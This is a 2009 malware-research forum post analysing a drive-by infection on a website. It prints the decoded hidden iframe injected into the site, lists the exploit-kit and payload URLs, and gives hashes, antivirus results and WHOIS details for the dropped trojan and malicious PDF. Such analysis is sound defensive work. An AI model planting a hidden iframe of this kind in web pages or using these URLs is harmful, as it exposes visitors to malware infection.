B.I.S.S. Forums > empornium.us: malicious scripting

Full Version: empornium.us: malicious scripting

B.I.S.S. Forums > Malware Research Forum > Malware Playground

Kimberly

Mar 24 2009, 11:06 PM

Upon visiting empornium.us users will have to face around 20 exploits attempting to infect their computer with malware. The Latest News section contains a small obfuscated javascript which once decoded reveals an iframe leading to ccounter.net/s/in.cgi?default.

CODE
<iframe src="http://ccounter.net/s/in.cgi?default" width="0" height="0" frameborder="0"></iframe>

From there we are redirected to unpck.com and index.php contains a highly obfuscated javascript.

Once decoded we notice 20 different exploits.

If one of the exploits is successful, 1.exe is saved as winbobupam9.exe on the victims computer.

Links.

ccounter.net/s/in.cgi?default
ccounter.net/s/in.cgi?2
unpck.com/unique/index.php
unpck.com/unique/load.php

winbobupam9.exe

Additional information
File size: 34304 bytes
MD5...: 63a726448b7e69e61bac59a912cd75f2
SHA1..: 061c9f815ab64bba71a236c1274486450768a30c
SHA256: 71fb1fc87185f9d93b8fa1155663f07cd36be31ebd0885dbca574cc53eb79749
PEiD..: -

QUOTE
a-squared 4.0.0.101 2009.03.24 -
AhnLab-V3 5.0.0.2 2009.03.24 -
AntiVir 7.9.0.120 2009.03.24 -
Authentium 5.1.2.4 2009.03.23 -
Avast 4.8.1335.0 2009.03.23 -
AVG 8.5.0.283 2009.03.23 SHeur2.XGZ
BitDefender 7.2 2009.03.24 -
CAT-QuickHeal 10.00 2009.03.24 -
ClamAV 0.94.1 2009.03.24 -
Comodo 1082 2009.03.23 -
DrWeb 4.44.0.09170 2009.03.24 Trojan.Fakealert.4094
eSafe 7.0.17.0 2009.03.23 Suspicious File
eTrust-Vet 31.6.6413 2009.03.23 -
F-Prot 4.4.4.56 2009.03.23 -
F-Secure 8.0.14470.0 2009.03.24 -
Fortinet 3.117.0.0 2009.03.24 -
GData 19 2009.03.24 -
Ikarus T3.1.1.48.0 2009.03.24 -
K7AntiVirus 7.10.679 2009.03.23 -
Kaspersky 7.0.0.125 2009.03.24 -
McAfee 5562 2009.03.23 -
McAfee+Artemis 5562 2009.03.23 -
McAfee-GW-Edition 6.7.6 2009.03.24 -
Microsoft 1.4502 2009.03.24 -
NOD32 3956 2009.03.24 -
Norman 6.00.06 2009.03.23 -
nProtect 2009.1.8.0 2009.03.24 -
Panda 10.0.0.10 2009.03.24 Suspicious file
PCTools 4.4.2.0 2009.03.23 -
Prevx1 V2 2009.03.24 -
Rising 21.22.11.00 2009.03.24 -
Sophos 4.39.0 2009.03.24 -
Sunbelt 3.2.1858.2 2009.03.23 -
Symantec 1.4.4.12 2009.03.24 -
TheHacker 6.3.3.4.288 2009.03.24 -
TrendMicro 8.700.0.1004 2009.03.24 -
VBA32 3.12.10.1 2009.03.23 suspected of Trojan-PSW.Pinch.34 (paranoid heuristics)
ViRobot 2009.3.23.1660 2009.03.24 -
VirusBuster 4.6.5.0 2009.03.23 -

ThreatExpert info

A malicious PDF file containing shellcode is also present on the same URL. - unpck.com/unique/pdf.php

File size: 76048 bytes
MD5...: 4637108ae649a4af27871c914e95cfbb
SHA1..: 0559f8e096021f9cff01ad399ec1604b5705b1b2
SHA256: a871cf478ef52ba4becad7cf417600f079be2f4b05d9ec27ccd2dc90eac078c9
PEiD..: -

QUOTE
a-squared 4.0.0.101 2009.03.24 Virus.JS.Pdfka!IK
AhnLab-V3 5.0.0.2 2009.03.24 -
AntiVir 7.9.0.120 2009.03.24 -
Antiy-AVL 2.0.3.1 2009.03.24 -
Authentium 5.1.2.4 2009.03.23 -
Avast 4.8.1335.0 2009.03.23 -
AVG 8.5.0.283 2009.03.24 -
BitDefender 7.2 2009.03.24 Exploit.PDF-JS.Gen
CAT-QuickHeal 10.00 2009.03.24 -
ClamAV 0.94.1 2009.03.24 -
Comodo 1083 2009.03.24 -
DrWeb 4.44.0.09170 2009.03.24 -
eSafe 7.0.17.0 2009.03.24 -
eTrust-Vet 31.6.6414 2009.03.24 -
F-Prot 4.4.4.56 2009.03.23 -
F-Secure 8.0.14470.0 2009.03.24 -
Fortinet 3.117.0.0 2009.03.24 -
GData 19 2009.03.24 Exploit.PDF-JS.Gen
Ikarus T3.1.1.48.0 2009.03.24 Virus.JS.Pdfka
K7AntiVirus 7.10.680 2009.03.24 -
Kaspersky 7.0.0.125 2009.03.24 -
McAfee 5563 2009.03.24 -
McAfee+Artemis 5563 2009.03.24 -
McAfee-GW-Edition 6.7.6 2009.03.24 -
Microsoft 1.4502 2009.03.24 -
NOD32 3957 2009.03.24 -
Norman 6.00.06 2009.03.24 -
nProtect 2009.1.8.0 2009.03.24 Exploit.PDF-JS.Gen.C03
Panda 10.0.0.10 2009.03.24 -
PCTools 4.4.2.0 2009.03.24 -
Prevx1 V2 2009.03.24 -
Rising 21.22.12.00 2009.03.24 -
Sophos 4.39.0 2009.03.24 -
Sunbelt 3.2.1858.2 2009.03.24 -
Symantec 1.4.4.12 2009.03.24 -
TheHacker 6.3.3.4.289 2009.03.24 -
TrendMicro 8.700.0.1004 2009.03.24 -
VBA32 3.12.10.1 2009.03.23 -
ViRobot 2009.3.24.1661 2009.03.24 -
VirusBuster 4.6.5.0 2009.03.24 -

<h4>

[center]IP details

[/center]</h4>

ccounter.net - 94.247.2.30

Creation Date: 27-dec-2008
Registrar: ENOM, INC.
Name Server: NS1.LDNSKA.CN - NS2.LDNSKA.CN
Registrant Contact:
Stanislaw Podlewski ()
Ul. Wspolna 30
Warsaw, WARSAW 930
PL

unpck.com - 79.174.64.209

Creation Date: 08-feb-2009
Name Server: DNS01.GPN.REGISTER.COM - DNS02.GPN.REGISTER.COM -DNS03.GPN.REGISTER.COM - DNS04.GPN.REGISTER.COM - DNS05.GPN.REGISTER.COM
Registrar: REGISTER.COM, INC.
Registrant Contact: Whois Privacy Protection Service, Inc.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.